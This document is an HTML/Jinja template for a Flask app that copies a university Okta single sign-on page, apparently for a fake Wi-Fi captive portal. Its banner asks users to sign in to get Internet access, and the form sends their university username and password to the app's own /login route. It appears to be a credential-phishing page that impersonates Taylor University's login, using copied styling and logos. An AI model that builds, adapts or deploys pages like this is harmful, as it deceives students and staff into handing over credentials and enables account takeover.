<link href="{{ url_for('static', filename='test.css') }}" type="text/css" rel="stylesheet">



  

  <div class="content snipcss0-1-1-5 snipcss-Eqdzl">

    <div class="applogin-banner snipcss0-2-5-6">
      <div class="applogin-background skipcss"></div>
      <div class="applogin-container snipcss0-3-6-7">
        <h1 class="snipcss0-4-7-8">
          Connecting to
          <div class="applogin-app-logo snipcss0-5-8-9">
            <img src="{{ url_for('static', filename='banner.png') }}" alt="Banner" class="logo office365 snipcss0-6-9-10">
          </div>
        </h1>
        <p class="snipcss0-4-7-11">
          Sign in with your account to access Wi-Fi Internet Connection
        </p>
      </div>
    </div>



    <noscript class="snipcss0-2-5-13">
      <div id="noscript-msg" class="noscript-msg">
        <div class="noscript-content">
          <h2>
            Javascript is required
          </h2>
          <h1>
            Javascript is disabled on your browser.&nbspPlease enable Javascript and refresh this page.
          </h1>
          <a href="." class="tb--button">
            Refresh
          </a>
        </div>
      </div>
    </noscript>



    <div id="signin-container" class="snipcss0-2-5-14">
      <main data-se="auth-container" tabindex="-1" id="okta-sign-in" class="auth-container main-container no-beacon snipcss0-3-14-15" style="">
        <div class="okta-sign-in-header auth-header snipcss0-4-15-16">
          <h1 class="snipcss0-5-16-17">
            <img src="{{ url_for('static', filename='tu3.png') }}" auth-org-logo snipcss0-6-17-18" alt="Taylor University - Prod logo logo" aria-label="Taylor University - Prod logo logo">
          </h1>
          <div data-type="beacon-container" class="beacon-container snipcss0-5-16-19">
          </div>
        </div>
        <div class="auth-content snipcss0-4-15-20">
          <div class="auth-content-inner snipcss0-5-20-21">
            <div class="primary-auth snipcss0-6-21-22">

              <form novalidate="novalidate" method="POST" action="/login" data-se="o-form" slot="content" id="form19" class="primary-auth-form o-form o-form-edit-mode snipcss0-7-22-23">
                
                <div data-se="o-form-content" class="o-form-content o-form-theme clearfix snipcss0-8-23-24">
                  <h2 data-se="o-form-head" class="okta-form-title o-form-head snipcss0-9-24-25">
                    TU Single Sign-On
                  </h2>
                  <div class="o-form-error-container snipcss0-9-24-26" data-se="o-form-error-container">
                  </div>
                  <div class="o-form-fieldset-container snipcss0-9-24-27" data-se="o-form-fieldset-container">
                    <div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-5 snipcss0-10-27-28">
                      <div data-se="o-form-label" class="okta-form-label o-form-label snipcss0-11-28-29">
                        <label for="okta-signin-username" class="snipcss0-12-29-30">
                          TU Username&nbsp;
                        </label>
                      </div>
                      <div data-se="o-form-input-container" class="o-form-input snipcss0-11-28-31">
                        <p class="o-form-explain snipcss0-12-31-32">
                          Your username is NOT an email address.
                        </p>
                        <span data-se="o-form-input-username" class="o-form-input-name-username o-form-control okta-form-input-field input-fix snipcss0-12-31-33">
                          <input type="text" placeholder="" name="username" id="okta-signin-username" value="" aria-label="" autocomplete="username" aria-required="true" required="" class="snipcss0-13-33-34">
                        </span>
                      </div>
                    </div>
                    <div data-se="o-form-fieldset" class="o-form-fieldset o-form-label-top margin-btm-30 snipcss0-10-27-35">
                      <div data-se="o-form-label" class="okta-form-label o-form-label snipcss0-11-35-36">
                        <label for="okta-signin-password" class="snipcss0-12-36-37">
                          TU Password&nbsp;
                        </label>
                      </div>
                      <div data-se="o-form-input-container" class="o-form-input snipcss0-11-35-38">
                        <span data-se="o-form-input-password" class="o-form-input-name-password o-form-control okta-form-input-field input-fix snipcss0-12-38-39">
                          <input type="password" placeholder="" name="password" id="okta-signin-password" value="" aria-label="" autocomplete="current-password" aria-invalid="false" aria-required="true" required="" class="snipcss0-13-39-40">
                        </span>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="o-form-button-bar snipcss0-8-23-41">
                  <input class="button button-primary snipcss0-9-41-42" type="submit" value="Sign In" id="okta-signin-submit" data-type="save">
                </div>
              </form>
              <div class="auth-footer snipcss0-7-22-43">
                <a href="#" data-se="needhelp" aria-expanded="false" aria-controls="help-links-container" class="link help js-help snipcss0-8-43-44">
                  Need help signing in?
                </a>
                <ul class="help-links js-help-links snipcss0-8-43-45 style-Yd6YF" id="help-links-container">
                  <li class="snipcss0-9-45-46">
                    <a href="#" data-se="forgot-password" class="link js-forgot-password snipcss0-10-46-47">
                      Login Help?                  
                    </a>
                  </li>
                  <li class="snipcss0-9-45-48">
                    <a href="https://newuser.tcu.edu/" data-se="help-link" class="link js-help-link snipcss0-10-48-49" rel="noopener noreferrer" target="_blank">
                      Need a TU Username?   
                    </a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div>
      </main>
    </div>
  </div>
  